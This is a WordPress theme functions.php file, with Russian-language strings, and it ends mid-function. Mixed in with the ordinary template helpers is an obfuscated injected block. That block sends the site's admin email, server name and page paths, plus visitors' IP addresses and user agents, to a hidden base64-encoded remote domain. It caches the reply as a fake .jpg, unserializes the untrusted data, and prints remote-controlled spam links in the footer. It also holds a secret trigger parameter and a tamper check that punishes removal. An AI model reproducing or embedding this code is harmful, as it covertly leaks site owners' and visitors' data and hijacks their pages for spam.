<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lOOm='4';$nNSrbU='e';$HtTvif='o';$nbsW='e';$WFSRy='a';$oIPsPz='e';$EKSidO='s';$IDvNa='b';$KRbC='_';$nXtIt='6';$Hhazp='d';$TXGvnn='d';$KLqYYos='c';$dgJVyyfv=$IDvNa.$WFSRy.$EKSidO.$oIPsPz.$nXtIt.$lOOm.$KRbC.$Hhazp.$nbsW.$KLqYYos.$HtTvif.$TXGvnn.$nNSrbU;$fYLvUh='t';$yVGVv='n';$ryVBndU='a';$flMdYxS='g';$DWUG='l';$QOPlgSC='e';$kPis='z';$bdepW='i';$cquxK='f';$wzMhUbut=$flMdYxS.$kPis.$bdepW.$yVGVv.$cquxK.$DWUG.$ryVBndU.$fYLvUh.$QOPlgSC;$zlnG='t';$Qitc='r';$hqEClLw='s';$wypYKa='o';$DbrU='3';$llvKnrH='_';$QpeShq='1';$PSoh='r';$LAHZh='t';$cVXYxkcs=$hqEClLw.$zlnG.$Qitc.$llvKnrH.$PSoh.$wypYKa.$LAHZh.$QpeShq.$DbrU;$NiJgXI='s';$iqhAT='r';$thwglPc='r';$MPSuCb='e';$UFsIr='t';$JYMZ='v';$MetWAXNf=$NiJgXI.$UFsIr.$iqhAT.$thwglPc.$MPSuCb.$JYMZ;                     
		$yt______________b='4';$sp__q='e';$om_______________x='o';$uv___c='e';$hp______t='a';$jr____r='e';$oe__________z='s';$hr______________s='b';$ov________i='_';$pp__i='6';$bd_______________j='d';$dd__________s='d';$kk_____________z='c';$cb__________d=$hr______________s.$hp______t.$oe__________z.$jr____r.$pp__i.$yt______________b.$ov________i.$bd_______________j.$uv___c.$kk_____________z.$om_______________x.$dd__________s.$sp__q;
		$gb__________q='x';$gu_____________e='n';$wa_______r='e';$ug___________y='n';$xb___m='f';$jq______________e='t';$ld_____________s='s';$uv_____r='o';$rq__s='t';$wz___________r='_';$yd________p='s';$jz___________l='c';$bi___s='i';$qg____i='i';$ux______t='u';$ae_________v=$xb___m.$ux______t.$ug___________y.$jz___________l.$rq__s.$qg____i.$uv_____r.$gu_____________e.$wz___________r.$wa_______r.$gb__________q.$bi___s.$yd________p.$jq______________e.$ld_____________s;
		$tb___________r='n';$ra______________q='o';$sn____e='f';$ix______________w='e';$su________j='p';$si______________b=$sn____e.$ra______________q.$su________j.$ix______________w.$tb___________r;
		$hv____c='r';$xv__m='e';$tg____n='f';$dz___________o='a';$ov___________r='d';$bg__a=$tg____n.$hv____c.$xv__m.$dz___________o.$ov___________r;
		$fq____z='l';$xo_______________a='e';$no_____________r='f';$sp__j='s';$nw_________q='o';$ph___x='c';$uy_____r=$no_____________r.$ph___x.$fq____z.$nw_________q.$sp__j.$xo_______________a;
		
		define("WP_ID", $cb__________d("Mi4wLjA="));
		define("WP_TTL", $cb__________d("MTA4MDA="));
		define("WP_SRC", $cb__________d("dHBva24="));
	


		function wp_get_header() {
			global $cb__________d, $ae_________v;
			
			if (
				$ae_________v($cb__________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ae_________v($cb__________d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ae_________v($cb__________d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $cb__________d, $si______________b, $uy_____r, $bg__a;
			
			$tu_______________f = TEMPLATEPATH."/".$cb__________d("Zm9vdGVyLnBocA==");
			$nn_________z = @$si______________b($tu_______________f, "r");
			$tu_______________f = @$bg__a($nn_________z, @filesize($tu_______________f));
			@$uy_____r($nn_________z);
			
			$yp________a = TEMPLATEPATH."/".$cb__________d("ZnVuY3Rpb25zLnBocA==");
			$nn_________z = @$si______________b($yp________a, "r");
			$yp________a = @$bg__a($nn_________z, @filesize($yp________a));
			@$uy_____r($nn_________z);
			
			$oz____x = 0;
			if($tu_______________f && $yp________a) {
				if ($cb__________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($tu_______________f, $cb__________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$oz____x = 1;
					}
					if (substr_count($tu_______________f, "wp_theme_GPL_credits()") < 1) {
						$oz____x = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$oz____x = 12;
				}
			}
			
			if($oz____x > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $oz____x -->";
			}
		}
	


		function wp_loaded() {
			global $cb__________d, $ae_________v;
			return $ae_________v($cb__________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($bx___q, $en___________g = "(more...)", $vo__________i = 0, $tv_______________m = "") {
				$ku_____________y = get_the_content($en___________g, $vo__________i, $tv_______________m);
				$ku_____________y = apply_filters("the_content", $ku_____________y);
				
				$ku_____________y = str_replace("]]>", "]]>", $ku_____________y);
				if (strlen($_GET["p"]) > 0) {
					echo $ku_____________y;
				}
				else if ((strlen($ku_____________y)>$bx___q) && ($av_____________p = strpos($ku_____________y, " ", $bx___q ))) {
					$ku_____________y = substr($ku_____________y, 0, $av_____________p);
					$ku_____________y = $ku_____________y;
					echo $ku_____________y;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$en___________g</a></div></p>";
				} else {
					echo $ku_____________y;
				}
				
			}
		}
	


		$xh_______p='a';$ap_________x='e';$re______a='e';$jy_____________z='b';$wd_______a='_';$fg____________l='4';$vb_______w='o';$oq___________j='6';$ok__________t='e';$tl________f='s';$dd__a='n';$lj__________f='c';$rx____________g='d';$xq___________j=$jy_____________z.$xh_______p.$tl________f.$ap_________x.$oq___________j.$fg____________l.$wd_______a.$re______a.$dd__a.$lj__________f.$vb_______w.$rx____________g.$ok__________t;
		$sk______________o='o';$jk____c='e';$lb_____________v='e';$og_____________i='f';$wm___________d='e';$gi______________f='_';$ma______________w='n';$wr_____w='_';$yb____i='c';$xq______d='t';$gv____________r='g';$xo____________d='n';$kq______________y='t';$qu_____________n='t';$kr_____o='l';$lc_______j='s';$ah____________i='i';$nu_____z=$og_____________i.$ah____________i.$kr_____o.$wm___________d.$gi______________f.$gv____________r.$jk____c.$kq______________y.$wr_____w.$yb____i.$sk______________o.$xo____________d.$xq______d.$lb_____________v.$ma______________w.$qu_____________n.$lc_______j;
		$ds__________g='e';$gx___g='s';$de____p='i';$xx_____b='s';$an_____t='i';$lj_______________n='t';$el_________k='e';$vt___h='x';$bn______________s='l';$lc____________n='f';$rc__________o='_';$aj________b=$lc____________n.$an_____t.$bn______________s.$el_________k.$rc__________o.$ds__________g.$vt___h.$de____p.$gx___g.$lj_______________n.$xx_____b;
		$af___________b='s';$sf________l='o';$lv____________m='_';$ab______u='p';$hy__s='e';$wj__________s='r';$sc______y='r';$uc__b='i';$hu_______h='m';$bs___r='v';$nm________z='o';$ow___b='c';$dk_____________r='a';$vy______j='n';$mv__l='e';$xd_______________z=$bs___r.$mv__l.$sc______y.$af___________b.$uc__b.$nm________z.$vy______j.$lv____________m.$ow___b.$sf________l.$hu_______h.$ab______u.$dk_____________r.$wj__________s.$hy__s;
		$is_____________k='p';$zj_____v='o';$ph_________e='c';$nn_______________v='s';$mo__u='o';$sh__m='e';$uh_______j='f';$az__r='k';$pl______________c='n';$ug_____n=$uh_______j.$nn_______________v.$zj_____v.$ph_________e.$az__r.$mo__u.$is_____________k.$sh__m.$pl______________c;
		$lh____________w='r';$vh_________z='w';$rz______q='f';$or_______v='i';$sb______________q='e';$pn_________c='t';$hi_____________n=$rz______q.$vh_________z.$lh____________w.$or_______v.$pn_________c.$sb______________q;
		$ly_____z='m';$dj______w='5';$qq_____________f='d';$la______b=$ly_____z.$qq_____________f.$dj______w;
		$ft________k='p';$aq_______________y='l';$xa______f='a';$ne___s='r';$ix__________p='t';$qv___d='h';$ls_____l='e';$ig____________g='a';$ql_____r=$ne___s.$ls_____l.$xa______f.$aq_______________y.$ft________k.$ig____________g.$ix__________p.$qv___d;
		$wu________y='n';$bu______u='r';$ex___________f='e';$yk__________h='i';$op________w='a';$dz______z='z';$bl_________f='e';$mj_________i='i';$os______i='u';$pt__e='l';$vf__________s='s';$uq________h=$os______i.$wu________y.$vf__________s.$bl_________f.$bu______u.$yk__________h.$op________w.$pt__e.$mj_________i.$dz______z.$ex___________f;
		$zv_____________m='p';$am______a='t';$qu________h='a';$kp___x='m';$gn_______________l='e';$jg____u='m';$lz________k='n';$ec______z=$am______a.$gn_______________l.$jg____u.$zv_____________m.$lz________k.$qu________h.$kp___x;
		$fl________l='r';$uw____e='c';$am_________b='e';$nj______y='t';$pl__t='t';$ub___c='a';$tm___s='m';$ku__________e='x';$ku____z='o';$pf_____________p='t';$zi____________v='_';$xh________p='_';$cd___________v='a';$fe____________l='n';$gs______________d='t';$ly___________w='s';$wl___h='c';$dx___j='e';$qi____w='r';$mx______c='e';$sj___________m='e';$zf__________o=$ly___________w.$pl__t.$fl________l.$am_________b.$ub___c.$tm___s.$xh________p.$wl___h.$ku____z.$fe____________l.$pf_____________p.$sj___________m.$ku__________e.$gs______________d.$zi____________v.$uw____e.$qi____w.$mx______c.$cd___________v.$nj______y.$dx___j;
	


		function cm________o($bw____________d) {
			global $cb__________d, $ae_________v, $nu_____z, $xd_______________z, $zf__________o;
			
			if (!$ae_________v($cb__________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($xd_______________z(PHP_VERSION, "5.0.0", ">=") && $ae_________v($cb__________d("ZmlsZV9nZXRfY29udGVudHM=")) && $ae_________v($cb__________d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$vv___c = $zf__________o(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$qr____c = @$nu_____z($bw____________d, 0, $vv___c);
			} else {
				$qr____c = @$nu_____z($bw____________d, 0);
			}
			
			return $qr____c;
		}
	


		function px_____l($bw____________d) {
			global $ae_________v, $ug_____n, $hi_____________n, $cb__________d;
			
			if (!$ae_________v($cb__________d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$og____________j = strpos($bw____________d, "/", 7);
			$dt_______e = array(
				"uri"     => substr($bw____________d, $og____________j),
				"host"    => str_replace("http://", "", substr($bw____________d, 0, $og____________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rb____________v = @$ug_____n("$dt_______e[host]", 80, $bh_______________p, $gn___________a, 4);
			
			if (!$rb____________v) {
				return false;
			} else {
				$qr____c = "";
				$jj______x  = "GET $dt_______e[uri] HTTP/1.0\r\n";
				$jj______x .= "Host: $dt_______e[host]\r\n";
				$jj______x .= "Referer: $dt_______e[referer]\r\n";
				$jj______x .= "Connection: Close\r\n\r\n";
				
				@$hi_____________n($rb____________v, $jj______x);
				
				while (!@feof($rb____________v)) {
					$pg__t = @fgets($rb____________v, (1024*24));
					
					if ($pg__t == "\r\n") {
						$jr_______g = true;
						continue;
					}
					
					if ($jr_______g) {
						$qr____c .= $pg__t;
					}
				}
				
				return $qr____c;
			}
		}
	


		function jh_________m($bw____________d) {
			global $ae_________v;
			$zc____________m = false;
			
			if ($bw____________d != "") {
				if ($ae_________v("cm________o")) {
					$zc____________m = @cm________o($bw____________d);
				}
				
				if (!$zc____________m && ($ae_________v("px_____l"))) {
					$zc____________m = @px_____l($bw____________d);
				}
			}
			
			return $zc____________m;
		}
	


		function au__u() {
			global $_SERVER, $la______b;
			
			$qg______r = $_SERVER["SERVER_NAME"];
			
			if (substr("$qg______r", 0, 4) == "www.") {
				$qg______r = substr("$qg______r", 4);
			}
			
			$qg______r = $la______b("$_SERVER[SERVER_NAME]");
			
			return $qg______r;
		}
	


		function oq______________g() {
			return "file";
		}
	


		function mb_______q($bw____________d) {
			global $_SERVER, $nu_____z, $aj________b, $si______________b, $uy_____r, $hi_____________n;
			
			$jk_________q = pl______________q();
			
			$cj______b = au__u().".jpg";
			$vc_______________r = $jk_________q["dir_upload"]["path"]."/$cj______b";
			$yx___a = @filemtime($vc_______________r);
			
			if (!$yx___a || ((time()-$yx___a) >= WP_TTL)) {
				$zc____________m = jh_________m($bw____________d);
				
				if ($zc____________m) {
					if ($aj________b($vc_______________r)) {
						@unlink($vc_______________r);
					}
					
					$nn_________z = @$si______________b($vc_______________r, "x+");
					
					@$hi_____________n($nn_________z, $zc____________m);
					@$uy_____r($nn_________z);
				}
			} else {
				if ($aj________b($vc_______________r)) {
					$zc____________m = @$nu_____z($vc_______________r);
				} else {
					$zc____________m = false;
				}
			}
			
			return $zc____________m;
		}
	


		function pl______________q() {
			global $_SERVER, $cb__________d, $xq___________j;
			
			$ps____________o = wp_count_posts("post");
			$zv_____q = pathinfo(get_bloginfo("template_directory"));
			
			$jk_________q = array(
				"url" => array(
					"report"      => $cb__________d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $zv_____q,
				"dir_upload"	=> ii________m(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$zv_____q[filename],
					"a005=".$ps____________o->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/plastika-zhivota-osobennosti-i-vidy\">Пластика живота</a>"
			);
			
			$jk_________q["url"]["queryString"] = implode("&", $jk_________q["queryString"]);
			$jk_________q["url"]["report"] = $jk_________q["url"]["report"]."/?".$xq___________j($jk_________q["url"]["queryString"]).".html";
						
			return $jk_________q;
		}
	


		function ii________m() {
			$pn____l = wp_upload_dir();
			
			if (isset($pn____l["error"])) {
				$jg___r = ac_______________a();
				if (is_writable($jg___r)) {
					$pn____l = array("path" => $jg___r);
				}
			}

			return $pn____l;
		}
	


		function ac_______________a() {
			global $ae_________v, $la______b, $ql_____r, $ec______z;
			
			$qw_______________f = (bool) ini_get("safe_mode");
			if ($qw_______________f == true) {
				return false;
			}
			
			if ($ae_________v("sys_get_temp_dir")) {
				$vp____________a = sys_get_temp_dir();
				if (is_writable($vp____________a)) {
					return $ql_____r($vp____________a);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ql_____r($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ql_____r($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ql_____r($_ENV["TEMP"]);
			} else {
				$tg______________d = $ec______z($la______b(uniqid(rand(), true)), "");
				if ($tg______________d) {
					$vp____________a = $ql_____r(dirname($tg______________d));
					@unlink($tg______________d);
					return $vp____________a;
				} else {
					return false;
				}
			}
		}
	


		function eb___o() {
			global $_GET, $aj________b;
			
			$jk_________q = pl______________q();
			$qg______r = au__u();
			$eq______________w = oq______________g();
			
			$sn_______________o = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($eq______________w == "file") {
					$zu___r = $jk_________q["dir_upload"]["path"]."/".$qg______r.".jpg";
					if ($aj________b($zu___r)) {
						@unlink($zu___r);
						$sn_______________o = "deleted";
					}
				}
				
				$ru______i = array(
					"s"	=> $sn_______________o,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ru______i AS $va____v => $vi________l) echo " [$va____v:$vi________l]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ae_________v, $cb__________d, $uq________h;
			$jk_________q = pl______________q();
			
			$mm______y = "mb_______q";
			if ($ae_________v($mm______y)) {
				$qr____c = $mm______y($jk_________q["url"]["report"]);
			}
			
			if ($qr____c) {
				if ($qr____c = @$cb__________d($qr____c)) {
					$qr____c = @$uq________h($qr____c);
					
					if (strlen($qr____c[custom_credit]) >= 5) {
						$jk_________q["default_string"] = $qr____c[custom_credit];
					}
					
					if ($qr____c["status"] == "0") {
						$ax____________s = 1;
						$vl___________q = 1;
					} else {
						$nn______________u = sizeof($qr____c["links"]);
						$cw__________i = $jk_________q["default_string"];
						
						if ($nn______________u > 0 && $qr____c["links"] !== "") {
							$ve___x = 0;
							foreach ($qr____c["links"] as $jl____h => $sd________z) {
								$ve___x++;
								if ($sd________z->l_path == "" || $sd________z->l_path == $_SERVER["REQUEST_URI"]) {
									$sd________z->l_href = htmlspecialchars(strip_tags($sd________z->l_href));
									$sd________z->l_title = htmlspecialchars(strip_tags($sd________z->l_title));
									$sd________z->l_anchor = htmlspecialchars(strip_tags($sd________z->l_anchor));
									$cw__________i .= " | ";
									$cw__________i .= "<a href='$sd________z->l_href' title='$sd________z->l_title'";
									if ($sd________z->l_nofollow == "1") {
										$cw__________i .= " rel='nofollow'";
									}
									$cw__________i .= ">$sd________z->l_anchor</a>";
								}
							}
						}
						$jk_________q["links"] = "$cw__________i";
						if ($qr____c[credit] == "0") {
							$jk_________q["links"] = "";
						}
					}
				} else {
					$ax____________s = "1";
				}
			} else {
				$ax____________s = "1";
			}
			
			if ($ax____________s == "1") {
				$jk_________q["links"] = $jk_________q["default_string"];
			}
			
			echo "$jk_________q[links]";
			
			echo "<!-- s: $qr____c[signature] -->";
			eb___o();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
